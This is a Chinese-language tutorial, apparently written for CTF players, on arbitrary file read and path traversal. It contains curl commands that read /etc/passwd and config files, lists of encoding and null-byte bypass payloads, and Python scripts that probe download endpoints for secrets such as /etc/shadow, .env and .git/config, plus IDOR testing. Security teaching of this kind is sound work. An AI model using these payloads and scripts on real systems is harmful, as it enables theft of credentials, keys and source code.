找到所有文件相关参数和下载接口，保存正常文件名、响应头和响应长度。
用不存在文件触发报错，尝试获得真实路径或工作目录。
用低风险目标验证读取能力：Linux 读 /etc/passwd，Windows 读 C:\Windows\win.ini，应用内读 .env 或配置。
根据过滤情况测试 ../、URL 编码、双重编码、反斜杠、后缀截断、PHP filter。
读取应用配置和源码，定位数据库、JWT secret、模板路径、flag 路径和路由。
若接口是 ID 下载，换账号和换 ID，验证是否是文件下载越权。

最小验证示例

下载接口正常请求：

curl -i "http://target/download?file=report.pdf"

验证路径穿越：

curl -i "http://target/download?file=../../../../etc/passwd"
curl -i "http://target/download?file=..%2f..%2f..%2f..%2fetc%2fpasswd"

如果目标是 PHP，读取源码优先用 Base64：

curl "http://target/view?page=php://filter/convert.base64-encode/resource=index.php"

拿到 Base64 后解码，重点搜索 flag、SECRET_KEY、DB_、routes、include、open(、readFile。

常见利用 / 解题路线

路线总览：

路径穿越路线：通过 ../、编码、反斜杠、双写绕过跳出下载目录。
文件 ID 越权路线：遍历 id 或替换成其他用户文件 ID，下载未授权文件。
源码读取路线：读 index.php、app.py、settings.py、application.yml、WEB-INF/web.xml。
配置密钥路线：读 .env、数据库配置、JWT secret、Flask/Django secret key，再联动伪造或登录。
日志利用路线：读访问日志、错误日志、进程环境，寻找 token、路径、注入痕迹或日志投毒机会。
包装器路线：PHP 用 php://filter，Java 关注 classpath，Linux 关注 /proc/self/environ 和 /proc/self/cmdline。

和路径穿越的关系

路径穿越是导致任意文件读取的一种常见原因。

但任意文件读取不只来自路径穿越。

它也可能来自：

文件 ID 映射错误。
URL 代理。
文件包含过滤器。
备份文件泄露。
调试接口。
读取接口权限缺失。

所以”任意文件读取”是结果，”路径穿越”是原因之一。

任意文件读取通常出现在以下位置：文件下载接口（/download?file=report.pdf）、图片预览接口（/view?src=avatar.png）、文件导出功能（/export?path=...）、模板渲染中的文件路径参数、以及文件名直接拼接到文件系统路径的场景。后端代码如果直接将用户输入拼接到文件路径中，例如 open(base_dir + user_input)，而没有对 ../ 这类穿越序列做过滤或校验，就会产生任意文件读取。

在 CTF 中，触发点往往不会直接暴露，可能隐藏在 API 参数、POST 请求体、HTTP Header（如 X-File-Path）、甚至 JSON 嵌套字段中。需要用 Burp Suite 逐个请求检查，找到所有涉及文件路径或文件名的参数。

利用方式

拿到任意文件读取能力后，利用顺序通常是：先读系统文件确认漏洞存在（/etc/passwd 是经典验证目标），再读应用配置文件获取数据库密码、密钥等敏感信息（.env、config.php、application.yml），然后读应用源码分析业务逻辑（找到路由、过滤规则、flag 位置），最后读日志文件或 /proc/self/ 下的进程信息辅助后续攻击（如获取环境变量中的 Secret Key 用于伪造 JWT）。

在 Java 应用中，WEB-INF/web.xml 和 WEB-INF/classes/ 目录是重点目标，可以获取完整的应用配置和编译后的字节码。在 Python 应用中，settings.py、wsgi.py 和 .env 文件往往包含关键配置。不要只读一个文件就停止，应该系统性地枚举目标。

常见敏感文件

Linux 常见：

/etc/passwd
/proc/self/environ
/proc/self/cmdline
应用配置文件
.env
源码文件
日志文件
SSH key

Windows 常见：

win.ini
hosts
应用配置
用户目录文件
IIS 配置

目标要根据技术栈选择，不是永远只读 /etc/passwd。

下载接口风险

下载接口常见形式：

/download?file=report.pdf
/file?id=123
/export?path=...

如果后端只根据用户提供路径或 ID 返回文件，而没有检查权限和目录边界，就可能泄露敏感文件。

文件名回显、报错路径、下载 Header 都可能给线索。

读取源码的价值

在 CTF 中，读源码往往比读系统文件更重要。

源码能暴露：

路由。
数据库配置。
密钥。
JWT secret。
过滤逻辑。
flag 路径。
反序列化类。

不要读到系统文件就停，应该继续找应用相关文件。

过滤绕过技巧

# 常见过滤器绕过方法

# 1. 路径穿越绕过
path_bypasses = [
    "../../../../etc/passwd",
    "....//....//....//etc/passwd",     # 双写
    "..%2f..%2f..%2fetc/passwd",        # URL 编码
    "..%252f..%252f..%252fetc/passwd",  # 双重编码
    "%2e%2e/%2e%2e/etc/passwd",         # 点号编码
    "..%c0%af..%c0%afetc/passwd",       # UTF-8 过编码
    "..%ef%bc%8f..%ef%bc%8fetc/passwd", # 全角斜杠
    "..\\..\\..\\etc\\passwd",           # 反斜杠 (Windows)
    "..../..../..../etc/passwd",         # 多余斜杠
]

# 2. 关键字过滤绕过
keyword_bypasses = [
    "/etc/passwd%00",                    # Null 字节截断
    "/etc/passwd%00.jpg",                # Null + 后缀
    "/etc/passwd%0a",                    # 换行符
    "/etc/passwd%20",                    # 空格
    "/etc/passwd#",                      # 井号
    "/etc/passwd?",                      # 问号
    "/etc/./passwd",                     # 当前目录
    "/etc/passwd/.",                     # 点号
    "/etc/passwd/..",                    # 上级目录 (相对)
]

# 3. 后缀拼接绕过
suffix_bypasses = [
    "/etc/passwd%00.html",               # Null 字节 (PHP < 5.3.4)
    "/etc/passwd%00.jpg",                # Null 字节
    "php://filter/read=convert.base64-encode/resource=/etc/passwd",
    "php://filter/convert.base64-encode/resource=config.php",
]

Null 字节注入

import requests

def test_null_byte_injection(url, param, file_path):
    """测试 Null 字节注入"""
    payloads = [
        f"{file_path}%00",
        f"{file_path}%00.jpg",
        f"{file_path}%00.png",
        f"{file_path}%00.html",
        f"{file_path}\x00",
        f"{file_path}\x00.jpg",
    ]

    for payload in payloads:
        try:
            resp = requests.get(url, params={param: payload}, timeout=5)
            if resp.status_code == 200 and len(resp.text) > 0:
                # 检查是否包含目标文件内容
                if "root:" in resp.text or "flag" in resp.text.lower():
                    print(f"[!] 成功: {payload}")
                    print(f"    响应长度: {len(resp.text)}")
                    return True
        except:
            pass

    return False

# 使用示例
# test_null_byte_injection("http://target.com/download", "file", "/etc/passwd")

PHP Stream Wrappers 详细用法

import requests
import base64

def php_stream_read(url, param, target_file):
    """使用 PHP 流包装器读取文件"""
    wrappers = [
        f"php://filter/read=convert.base64-encode/resource={target_file}",
        f"php://filter/convert.base64-encode/resource={target_file}",
        f"php://filter/string.rot13/resource={target_file}",
        f"php://filter/string.toupper/resource={target_file}",
        f"compress.zlib://{target_file}",
        f"compress.bzip2://{target_file}",
    ]

    for wrapper in wrappers:
        try:
            resp = requests.get(url, params={param: wrapper}, timeout=5)
            if resp.status_code == 200 and resp.text.strip():
                # 尝试 base64 解码
                try:
                    decoded = base64.b64decode(resp.text.strip()).decode('utf-8', errors='ignore')
                    if len(decoded) > 0:
                        print(f"[!] {wrapper}")
                        print(f"    内容: {decoded[:200]}")
                        return decoded
                except:
                    if len(resp.text) > 10:
                        print(f"[*] {wrapper}")
                        print(f"    原始响应: {resp.text[:200]}")
        except:
            pass

    return None

def php_stream_write(url, param, content):
    """使用 PHP 流包装器写入文件 (如果有写入功能)"""
    # data:// 协议
    payload = f"data://text/plain;base64,{base64.b64encode(content.encode()).decode()}"
    return payload

# 使用示例
# php_stream_read("http://target.com/view", "page", "config.php")
# php_stream_read("http://target.com/view", "page", "/etc/passwd")

下载接口滥用

import requests

def test_download_endpoint(url, param="file"):
    """测试下载接口的文件读取"""
    # 常见下载参数名
    common_params = ["file", "path", "filename", "name", "download", "doc", "document"]

    # 敏感文件列表
    sensitive_files = [
        "/etc/passwd",
        "/etc/hosts",
        "/etc/shadow",
        "/proc/self/environ",
        "/proc/self/cmdline",
        "/proc/self/fd/0",
        ".env",
        "config.php",
        "config.yml",
        "database.yml",
        "wp-config.php",
        ".htpasswd",
        ".git/config",
        "WEB-INF/web.xml",
        "application.properties",
    ]

    for param_name in common_params:
        for file_path in sensitive_files:
            try:
                resp = requests.get(url, params={param_name: file_path}, timeout=3)
                if resp.status_code == 200 and len(resp.text) > 10:
                    # 检查是否包含敏感内容指示
                    indicators = ["root:", "password", "secret", "key", "database", "DB_"]
                    if any(ind in resp.text for ind in indicators):
                        print(f"[!] {param_name}={file_path}")
                        print(f"    长度: {len(resp.text)}")
            except:
                pass

# IDOR 文件下载
def test_file_idor(url, file_ids):
    """测试文件 ID 越权"""
    for fid in file_ids:
        try:
            resp = requests.get(url, params={"id": fid}, timeout=3)
            if resp.status_code == 200:
                content_type = resp.headers.get("Content-Type", "")
                content_disp = resp.headers.get("Content-Disposition", "")
                print(f"ID {fid}: {resp.status_code} | {content_type} | {content_disp}")
        except:
            pass

常见敏感文件路径

Linux 系统文件:
  /etc/passwd              用户信息
  /etc/shadow              密码哈希 (需要 root)
  /etc/hosts               主机名映射
  /etc/resolv.conf         DNS 配置
  /etc/crontab             定时任务
  /proc/self/environ       环境变量
  /proc/self/cmdline       启动命令
  /proc/self/status        进程状态
  /proc/version            内核版本
  /proc/net/tcp            TCP 连接

应用配置文件:
  .env                     环境变量 (常含密码)
  config.php               PHP 配置
  config.yml / config.yaml YAML 配置
  database.yml             数据库配置
  application.properties   Java 配置
  settings.py              Django 配置
  wp-config.php            WordPress 配置
  .htpasswd                HTTP 认证密码
  .htaccess                Apache 配置

版本控制:
  .git/config              Git 配置
  .git/HEAD                Git HEAD
  .svn/entries             SVN 信息

Java 应用:
  WEB-INF/web.xml          Web 配置
  WEB-INF/classes/         类文件
  META-INF/MANIFEST.MF     清单文件

Windows:
  C:\Windows\win.ini
  C:\Windows\System32\drivers\etc\hosts
  C:\inetpub\logs\LogFiles\  IIS 日志

文件读取自动化脚本

import requests
import base64
import sys

def auto_file_read(base_url, param, file_path):
    """自动化文件读取"""
    # 尝试多种方式读取
    attempts = [
        file_path,                                    # 直接路径
        f"../{file_path}",                            # 相对路径
        f"php://filter/read=convert.base64-encode/resource={file_path}",  # PHP filter
        f"data://text/plain;base64,{base64.b64encode(file_path.encode()).decode()}",  # data
    ]

    for attempt in attempts:
        try:
            resp = requests.get(base_url, params={param: attempt}, timeout=5)
            if resp.status_code == 200 and len(resp.text) > 5:
                content = resp.text
                # 尝试 base64 解码
                try:
                    decoded = base64.b64decode(content.strip()).decode('utf-8', errors='ignore')
                    if len(decoded) > len(content) * 0.5:
                        content = decoded
                except:
                    pass

                print(f"[+] 成功: {attempt}")
                print(f"    内容 (前500字): {content[:500]}")
                return content
        except:
            pass

    return None

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("用法: python3 file_read.py <url> <param> <file>")
        sys.exit(1)

    auto_file_read(sys.argv[1], sys.argv[2], sys.argv[3])

常见失败原因

把读取 /etc/passwd 当成最终目标：它只是证明点，真正价值通常在源码、配置、环境变量和 flag 路径。
不看应用工作目录：先通过报错、/proc/self/cmdline、配置文件判断应用根目录。
只试路径穿越：文件 ID 越权、备份文件、调试接口和 URL 代理也能造成任意读取。
编码绕过失败就停止：继续测试双重编码、反斜杠、当前目录、后缀拼接、大小写和不同参数位置。
读 PHP 源码乱码或空白：改用 php://filter/convert.base64-encode/resource=...。
Windows 路径没测：Windows 题要测反斜杠、盘符、win.ini、IIS 日志和应用配置。
只看状态码：下载接口常返回 200 的错误页，要比较响应长度、Content-Type、文件头和关键字。

迷你案例

题目有 /download?file=manual.pdf。先测试不存在文件：

curl -i "http://target/download?file=notfound"

报错泄露 /var/www/app/files/notfound，说明后端拼接文件路径。尝试读取系统文件：

curl "http://target/download?file=../../../../etc/passwd"

返回包含 root:x:0:0，证明任意读取成立。下一步读源码而不是停下：

curl "http://target/download?file=../app.py"
curl "http://target/download?file=../.env"

源码中发现 FLAG_PATH=/flag_7ad9，最终读取：

curl "http://target/download?file=../../../../flag_7ad9"

这个案例的闭环是：报错定位根目录 -> 系统文件验证 -> 源码/配置读取 -> flag 路径定位 -> 读取目标文件。